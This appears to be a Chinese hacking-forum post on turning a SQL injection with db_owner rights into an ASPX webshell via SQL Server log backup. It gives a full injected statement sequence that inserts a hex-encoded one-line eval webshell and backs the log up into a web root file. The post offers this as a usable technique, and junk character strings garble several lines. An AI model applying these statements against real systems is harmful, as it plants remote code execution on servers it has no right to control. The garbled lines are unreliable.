最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
2 t2 n. T( h' V9 A! U& H但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
% {3 m# x; S6 S2 L' P经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。& R9 E$ @* {7 V
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
& ?8 W5 C) q2 l
. j2 v' s9 N( z- \0 U% [--------------------------------------------------------------; S) o1 y/ Q w* d
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错, U+ u( \3 X1 h. H3 n! y3 G
自己修改备份语句如下:9 r3 H$ J9 l; B4 J
Drop table cmd;--
# x( U$ T# {6 qalter database db_test set RECOVERY FULL;--4 `2 f; G1 N+ K
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段6 i& a) y3 W( O2 H: e6 t# \% G7 g
backup log db_test to disk = 'c:\bak' with init;--( b5 D" j4 @9 ]; Z& {8 L
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--8 O8 a. e) D) Y, V8 N+ h8 J
delete from cmd where id>1;--删除id>1的数据
0 b: J1 N. H$ K F2 kbackup log db_test to disk = 'e:\webroot\test.aspx';--
- \# c% B6 h$ y, S! W3 X/ U- ]Drop table cmd;--
0 j, @* v+ d% a; b( {: B3 U/ M- t0 L2 _希望对大家有用。 |